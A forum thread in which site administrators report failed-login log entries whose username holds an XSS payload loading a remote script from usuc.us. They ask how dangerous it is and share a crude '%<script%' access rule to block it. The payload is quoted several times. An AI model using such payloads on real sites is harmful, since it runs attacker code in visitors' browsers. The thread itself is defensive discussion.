*Login attempt failed for <script src=http://usuc.us/j.php*

There were 5 times the watchdog logged this attempt on our site.

Is this what you call `Cross Site Scripting' (XSS)?

How serious or dangerous is this kind of attempt, and how to block further attempts?

*Details:

Message	Login attempt failed for <script src=http://usuc.us/j.php>jonny</script>: Sorry. Unrecognized username or password. <a href="user/password">Have you forgotten your password?</a>.

Severity	notice

Hostname	72.237.26.86

Comments

Muslim guy’s picture

*Login attempt failed for "script src=http://usuc.us/j.php*

There were 5 times the watchdog logged this attempt on our site.

Is this what you call `Cross Site Scripting' (XSS)?

How serious or dangerous is this kind of attempt, and how to block further attempts?

*Sorry I forgot to truncate the code

Ryanbach’s picture

They seem to be trying to do that, however, it seems that it failed.

nickom’s picture

I have the same attempt logged twice by the watchdog, it was blocked but I guess its only a matter of time before they find a way to hack their way in.

Type user
Date Saturday, November 18, 2006 - 3:22pm
User Visitor
Message Login attempt failed for

jonny

.
Severity notice
Hostname 70.84.128.116

nrasmus’s picture

With the exact same domain, & username. (though across several IPs).

I added the following access rule--probably a feable attempt at blocking it, but . . .

%<script%